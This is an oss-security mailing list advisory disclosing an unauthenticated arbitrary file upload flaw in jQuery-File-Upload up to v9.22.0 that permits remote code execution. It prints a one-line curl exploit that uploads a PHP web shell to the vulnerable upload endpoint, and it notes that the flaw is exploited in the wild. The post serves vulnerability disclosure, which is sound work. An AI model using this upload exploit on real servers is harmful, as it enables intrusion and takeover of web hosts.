Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 11 Oct 2018 16:06:21 +0000 (GMT)
From: "Larry W. Cashdollar" <>
To: Open Source Security <>
 jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability

Title: jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability
Author: Larry W. Cashdollar, @_larry0
Date: 2018-10-09
Download Site:
Vendor Notified: 2018-10-09
Vendor Contact:
Description: File Upload widget with multiple file selection, drag&drop support, progress bar, validation and preview images, audio and video for jQuery. Supports cross-domain, chunked and resumable file uploads. Works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads.
The code in doesn't require any validation to upload files to the server. It also doesn't exclude file types. This allows for remote code execution.

Exploit Code:
$ curl -F "files=@...ll.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php

Where shell.php is:

Screen Shots:
Notes: Actively being exploited in the wild.
Content of type "text/html" skipped

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.